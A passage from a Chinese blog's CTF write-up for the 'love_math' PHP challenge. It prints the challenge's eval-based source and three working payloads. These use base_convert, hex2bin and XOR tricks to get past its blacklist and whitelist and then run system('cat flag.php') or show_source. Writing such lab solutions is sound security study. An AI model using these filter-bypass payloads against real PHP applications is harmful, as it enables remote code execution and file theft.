<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>i春秋国赛 love_math | Manayakko - 微笑才是王道</title><meta name="description" content="摸鱼有一段时间了，国赛一道很不错的题目，看了大佬们的思路后，花了快一周时间,自己整理学习一下"><meta name="keywords" content="ctf,writeup"><meta name="author" content="Manayakko"><meta name="copyright" content="Manayakko"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/yakko117/img/favicon.png"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><meta name="twitter:card" content="summary"><meta name="twitter:title" content="i春秋国赛 love_math"><meta name="twitter:description" content="摸鱼有一段时间了，国赛一道很不错的题目，看了大佬们的思路后，花了快一周时间,自己整理学习一下"><meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138jvy6j31hc0u01kx.jpg"><meta property="og:type" content="article"><meta property="og:title" content="i春秋国赛 love_math"><meta property="og:url" content="https://manayakko.github.io/yakko117/2019/05/16/love_math/"><meta property="og:site_name" content="Manayakko - 微笑才是王道"><meta property="og:description" content="摸鱼有一段时间了，国赛一道很不错的题目，看了大佬们的思路后，花了快一周时间,自己整理学习一下"><meta property="og:image" content="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138jvy6j31hc0u01kx.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = 'false'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/yakko117/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://manayakko.github.io/yakko117/2019/05/16/love_math/"><link rel="prev" title="Hacker101 CTF writeup" href="https://manayakko.github.io/yakko117/2019/07/07/hacker101/"><link rel="next" title="2019“弟弟吹头发”wp" href="https://manayakko.github.io/yakko117/2019/04/18/DDctf2019/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/yakko117/',
  algolia: undefined,
  localSearch: {"path":"./yakko117/search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: false,
  copyright: {"languages":{"author":"作者: Manayakko","link":"链接: https://manayakko.github.io/yakko117/2019/05/16/love_math/","source":"来源: Manayakko - 微笑才是王道","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/yakko117/atom.xml" title="Manayakko - 微笑才是王道" type="application/atom+xml">
</head><body><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/yakko117/">Manayakko - 微笑才是王道</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/yakko117/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/about/"><i class="fa-fw fa fa-simplybuilt"></i><span> 关于本人</span></a></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/yakko117/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/yakko117/archives/"><div class="headline">文章</div><div class="length_num">60</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/yakko117/tags/"><div class="headline">标签</div><div class="length_num">10</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/yakko117/categories/"><div class="headline">分类</div><div class="length_num">3</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/yakko117/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/about/"><i class="fa-fw fa fa-simplybuilt"></i><span> 关于本人</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#Love-Math"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">Love_Math</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#解法1"><span class="toc_mobile_items-number">1.1.</span> <span class="toc_mobile_items-text">解法1</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#解法2"><span class="toc_mobile_items-number">1.2.</span> <span class="toc_mobile_items-text">解法2</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#解法3"><span class="toc_mobile_items-number">1.3.</span> <span class="toc_mobile_items-text">解法3</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#后记"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">后记</span></a></li></ol></div></div></div><div id="body-wrap"><div id="web_bg" data-type="photo"></div><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Love-Math"><span class="toc-number">1.</span> <span class="toc-text">Love_Math</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#解法1"><span class="toc-number">1.1.</span> <span class="toc-text">解法1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#解法2"><span class="toc-number">1.2.</span> <span class="toc-text">解法2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#解法3"><span class="toc-number">1.3.</span> <span class="toc-text">解法3</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-number">2.</span> <span class="toc-text">后记</span></a></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138jvy6j31hc0u01kx.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">i春秋国赛 love_math</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2019-05-16<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2019-05-16</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon fa-fw" aria-hidden="true"></i><a class="post-meta__categories" href="/yakko117/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a></span><div class="post-meta-wordcount"><div class="post-meta-pv-cv"></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="Love-Math"><a href="#Love-Math" class="headerlink" title="Love_Math"></a>Love_Math</h1><div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line"><span class="comment">//听说你很喜欢数学，不知道你是否爱它胜过爱flag </span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'c'</span>]))&#123; </span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>); </span><br><span class="line">&#125;<span class="keyword">else</span>&#123; </span><br><span class="line">    <span class="comment">//例子 c=20-1 </span></span><br><span class="line">    $content = $_GET[<span class="string">'c'</span>]; </span><br><span class="line">    <span class="keyword">if</span> (strlen($content) &gt;= <span class="number">80</span>) &#123; </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"太长了不会算"</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    $blacklist = [<span class="string">' '</span>, <span class="string">'\t'</span>, <span class="string">'\r'</span>, <span class="string">'\n'</span>,<span class="string">'\''</span>, <span class="string">'"'</span>, <span class="string">'`'</span>, <span class="string">'\['</span>, <span class="string">'\]'</span>]; </span><br><span class="line">    <span class="keyword">foreach</span> ($blacklist <span class="keyword">as</span> $blackitem) &#123; </span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/'</span> . $blackitem . <span class="string">'/m'</span>, $content)) &#123; </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"请不要输入奇奇怪怪的字符"</span>); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="comment">//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp </span></span><br><span class="line">    $whitelist = [<span class="string">'abs'</span>, <span class="string">'acos'</span>, <span class="string">'acosh'</span>, <span class="string">'asin'</span>, <span class="string">'asinh'</span>, <span class="string">'atan2'</span>, <span class="string">'atan'</span>, <span class="string">'atanh'</span>, <span class="string">'base_convert'</span>, <span class="string">'bindec'</span>, <span class="string">'ceil'</span>, <span class="string">'cos'</span>, <span class="string">'cosh'</span>, <span class="string">'decbin'</span>, <span class="string">'dechex'</span>, <span class="string">'decoct'</span>, <span class="string">'deg2rad'</span>, <span class="string">'exp'</span>, <span class="string">'expm1'</span>, <span class="string">'floor'</span>, <span class="string">'fmod'</span>, <span class="string">'getrandmax'</span>, <span class="string">'hexdec'</span>, <span class="string">'hypot'</span>, <span class="string">'is_finite'</span>, <span class="string">'is_infinite'</span>, <span class="string">'is_nan'</span>, <span class="string">'lcg_value'</span>, <span class="string">'log10'</span>, <span class="string">'log1p'</span>, <span class="string">'log'</span>, <span class="string">'max'</span>, <span class="string">'min'</span>, <span class="string">'mt_getrandmax'</span>, <span class="string">'mt_rand'</span>, <span class="string">'mt_srand'</span>, <span class="string">'octdec'</span>, <span class="string">'pi'</span>, <span class="string">'pow'</span>, <span class="string">'rad2deg'</span>, <span class="string">'rand'</span>, <span class="string">'round'</span>, <span class="string">'sin'</span>, <span class="string">'sinh'</span>, <span class="string">'sqrt'</span>, <span class="string">'srand'</span>, <span class="string">'tan'</span>, <span class="string">'tanh'</span>];</span><br><span class="line">    preg_match_all(<span class="string">'/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/'</span>, $content, $used_funcs); </span><br><span class="line">    <span class="keyword">foreach</span> ($used_funcs[<span class="number">0</span>] <span class="keyword">as</span> $func) &#123; </span><br><span class="line">        <span class="keyword">if</span> (!in_array($func, $whitelist)) &#123; </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"请不要输入奇奇怪怪的函数"</span>); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="comment">//帮你算出答案 </span></span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">'echo '</span>.$content.<span class="string">';'</span>); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>可以看到题目限制了参数长度要求小于80<br>并且不能包含<code>空格</code>、<code>制表符</code>、<code>换行</code>、<code>单双引号</code>、<code>反引号</code>、<code>[]</code> 。<br>并且有白名单限制输入的字符；<br>最终执行 <code>eval(&#39;echo &#39;.$content.&#39;;&#39;);</code></p>
<p>想要 <code>getshell</code>，需要能获得任意字符串。但由于单双引号都被waf了，我们无法从函数名中提取字符串。因此只能想办法从函数的返回结果中获得。</p>
<p>通过查看文档， 发现 <code>base_convent</code> 函数可以返回任意字母， 但是无法返回 <code>_ *</code> 等特殊字符</p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj52nvj30pf0dydio.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj52nvj30pf0dydio.jpg" class="lazyload"></a></p>
<p>尝试将 <code>phpinfo</code> 先转换成 <code>hex</code> 形式再转换成十进制，查看结果</p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj4494j30lo0d9jsi.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj4494j30lo0d9jsi.jpg" class="lazyload"></a></p>
<p>成功执行 <code>phpinfo()</code></p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj44lqj30uz0dmt9w.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj44lqj30uz0dmt9w.jpg" class="lazyload"></a></p>
<p>执行系统命令 <code>system&#39;ls&#39;</code></p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj3suuj30s406zglx.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj3suuj30s406zglx.jpg" class="lazyload"></a></p>
<p>现在我们要想办法得到<code>flag.php</code> ，有以下方法:</p>
<ol>
<li>使用php函数 <code>readfile</code> 读取文件， 但是需要 <code>flag.php</code> 中的 <code>·</code>；</li>
<li>由于长度问题，我们无法直接在参数c里传过多的白名单函数+字符，因此需要使用 $_GET 全局变量手动传入参数 getshell，不直接使用参数c，即可绕过，但要注意的是此处的参数名，不能为字母，只能为数字，不然会被第二个关键词白名单所拦截；</li>
<li>使用system 等命令执行函数配合通配符 <code>*</code> 读取文件.</li>
</ol>
<hr>
<h2 id="解法1"><a href="#解法1" class="headerlink" title="解法1"></a>解法1</h2><p>为了缩短字符长度，我们可以将函数 <code>base_convert</code> 赋值给一个短变量名,由于白名单的限制，我们最少需要两个字符，即 <code>$pi</code> 。</p>
<p>(这里直接套用大佬的一个脚本)</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$ss=<span class="keyword">array</span>(<span class="string">'a'</span>,<span class="string">'b'</span>,<span class="string">'c'</span>,<span class="string">'d'</span>,<span class="string">'e'</span>,<span class="string">'f'</span>,<span class="string">'0'</span>,<span class="string">'1'</span>,<span class="string">'2'</span>,<span class="string">'3'</span>,<span class="string">'4'</span>,<span class="string">'5'</span>,<span class="string">'6'</span>,<span class="string">'7'</span>,<span class="string">'8'</span>,<span class="string">'9'</span>,<span class="string">'['</span>,<span class="string">'Q'</span>,<span class="string">'P'</span>,<span class="string">'S'</span>,<span class="string">'U'</span>,<span class="string">'R'</span>,<span class="string">'W'</span>,<span class="string">'T'</span>,<span class="string">'V'</span>,<span class="string">'Y'</span>,<span class="string">'X'</span>,<span class="string">'Z'</span>,<span class="string">'\','</span>_<span class="string">','</span>^<span class="string">','</span>]<span class="string">');</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">foreach ($ss as $w) &#123;</span></span><br><span class="line"><span class="string">    foreach ($ss as $r)&#123;</span></span><br><span class="line"><span class="string">        echo $w;</span></span><br><span class="line"><span class="string">        echo(" and ");</span></span><br><span class="line"><span class="string">        echo $r;</span></span><br><span class="line"><span class="string">        echo(" &lt;=&gt; ");</span></span><br><span class="line"><span class="string">        echo ($w^$r);</span></span><br><span class="line"><span class="string">        echo(" &lt;=&gt; ");</span></span><br><span class="line"><span class="string">        echo(ord($w^$r));</span></span><br><span class="line"><span class="string">        echo ("&lt;br&gt;");</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<p>发现无法异或出 <code>.</code> ，但是可以dechex函数可以把10进制转换为16进制，我们可以再异或出hex2bin，来获取任意ASCII字符。</p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj7rwgj30i20g3my1.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj7rwgj30i20g3my1.jpg" class="lazyload"></a></p>
<p>构造如下 Payload:</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">($pi=base_convert)(<span class="number">2146934604002</span>,<span class="number">10</span>,<span class="number">36</span>)($pi(<span class="number">727432</span>,<span class="number">10</span>,<span class="number">36</span>).$pi(<span class="number">37907361743</span>,<span class="number">10</span>,<span class="number">36</span>)(dechex(<span class="number">46</span>)).$pi(<span class="number">33037</span>,<span class="number">10</span>,<span class="number">36</span>));</span><br></pre></td></tr></table></figure></div>
<p>可惜超过字符长度限制了，在本地没有字符限制条件下测试 可以读取</p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xjc8c7j30q106f3yt.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xjc8c7j30q106f3yt.jpg" class="lazyload"></a></p>
<p>由于 <code>Ascii</code> 转成 <code>Hex</code> 后转回来需要 <code>hex2bin</code> 函数，而白名单里并没有这个函数<br>所以我们需要使用进制转换进行绕过，又因为 <code>hex2bin</code> 里部分字母只有在32进制后才会出现，所以此处我们选择36进制。<br>将 <code>hex2bin</code> 由36进制成无字母的10进制得到：<code>37907361743</code>我们使用 <code>base_convert（37907361743，10,36)</code> 即可转换成 <code>hex2bin</code>，而<code>_GET</code>的 <code>hex</code> 为 <code>5f474554</code>，里边包含了字母f，需要在进行一次转换：f正好为16进制里的最后一个字母，可直接使用 <code>dechex(1598506324)</code> 即可绕过。故 </p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$pi&#x3D;base_convert(37907361743,10,36)(dechex(1598506324))</span><br></pre></td></tr></table></figure></div>

<p>即为 <code>$pi = _GET</code><br>接着构造 <code>$$pi = $_GET</code> ，可知 <code>$$pi[x]()</code> 可以自定义函数名， 但 <code>[]</code>内不能为字母，因此采用 <code>$$pi{0}($$pi{1})</code><br>Payload 如下：</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c&#x3D;$pi&#x3D;base_convert(37907361743,10,36)(dechex(1598506324));$$pi&#123;0&#125;($$pi&#123;1&#125;);&amp;0&#x3D;show_source&amp;1&#x3D;flag.php</span><br></pre></td></tr></table></figure></div>

<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138bdrfj313l05qt95.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138bdrfj313l05qt95.jpg" class="lazyload"></a></p>
<hr>
<h2 id="解法2"><a href="#解法2" class="headerlink" title="解法2"></a>解法2</h2><p>同样的，我们fuzz发现无法异或出 <code>*</code>，需要借助 <code>hex2bin</code> 函数。</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> base_convert(<span class="string">'system'</span>,<span class="number">36</span>,<span class="number">10</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;/br&gt;'</span>;</span><br><span class="line">    <span class="comment">// cat * 的十六进制为 636174202a</span></span><br><span class="line">    <span class="keyword">echo</span> hexdec(<span class="string">'636174202a'</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;/br&gt;'</span>;</span><br><span class="line">    <span class="keyword">echo</span> hex2bin(dechex(<span class="number">426836762666</span>));</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>)</span><br></pre></td></tr></table></figure></div>

<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj6d6oj30fr0ce758.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xj6d6oj30fr0ce758.jpg" class="lazyload"></a></p>
<p>payload如下:</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">($pi=base_convert)(<span class="number">1751504350</span>,<span class="number">10</span>,<span class="number">36</span>)($pi(<span class="number">37907361743</span>,<span class="number">10</span>,<span class="number">36</span>)(dechex(<span class="number">426836762666</span>)))</span><br></pre></td></tr></table></figure></div>

<hr>
<p>但是长度超了， 需要想办法缩短字符<br>通过百度， 发现 <code>nl</code> 命令也可以读取文件<br>fuzz <code>hex2bin</code> 的进制数发现 <code>1438255411</code> 更短</p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138aofmj30eg06oglx.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138aofmj30eg06oglx.jpg" class="lazyload"></a></p>
<p>最终 Payload:</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">($pi=base_convert)(<span class="number">1751504350</span>,<span class="number">10</span>,<span class="number">36</span>)($pi(<span class="number">1438255411</span>,<span class="number">14</span>,<span class="number">34</span>)(dechex(<span class="number">1852579882</span>)))</span><br></pre></td></tr></table></figure></div>

<p>得到<strong>flag</strong><br><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xjbep2j30yd0hy414.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g330xjbep2j30yd0hy414.jpg" class="lazyload"></a></p>
<hr>
<h2 id="解法3"><a href="#解法3" class="headerlink" title="解法3"></a>解法3</h2><p>由解法1可以知道，可以异或出 <code>_</code>， 而且 ‘$’ 没有被waf， 我们可以使用 <code>$_GET</code>全局变量手动传入参数来 getshell;<br>虽然 <code>[]</code> 被waf了， 但是可以用 <code>{}</code> 来提取数组中的值.<br>通过上述的脚本,可以得到<br><code>1^n=_; 5^r=G; 1^t=E; 7^c=T</code></p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138dfr7j30dm09a0t3.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g33138dfr7j30dm09a0t3.jpg" class="lazyload"></a></p>
<p>不难构造出<br><code>$pi=base_convert;$pi=$pi(53179,10,36)^$pi(1109136,10,36);${$pi}{0}(${$pi}{1})</code></p>
<p>payload:</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">php</div></div><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0</span>=system&amp;<span class="number">1</span>=cat flag.php&amp;c=$pi=base_convert;$pi=$pi(<span class="number">53179</span>,<span class="number">10</span>,<span class="number">36</span>)^$pi(<span class="number">1109136</span>,<span class="number">10</span>,<span class="number">36</span>);$&#123;$pi&#125;&#123;<span class="number">0</span>&#125;($&#123;$pi&#125;&#123;<span class="number">1</span>&#125;)</span><br><span class="line"><span class="comment">// 或者</span></span><br><span class="line"><span class="number">0</span>=show_source&amp;<span class="number">1</span>=flag.php&amp;c=$pi=base_convert;$pi=$pi(<span class="number">53179</span>,<span class="number">10</span>,<span class="number">36</span>)^$pi(<span class="number">1109136</span>,<span class="number">10</span>,<span class="number">36</span>);$&#123;$pi&#125;&#123;<span class="number">0</span>&#125;($&#123;$pi&#125;&#123;<span 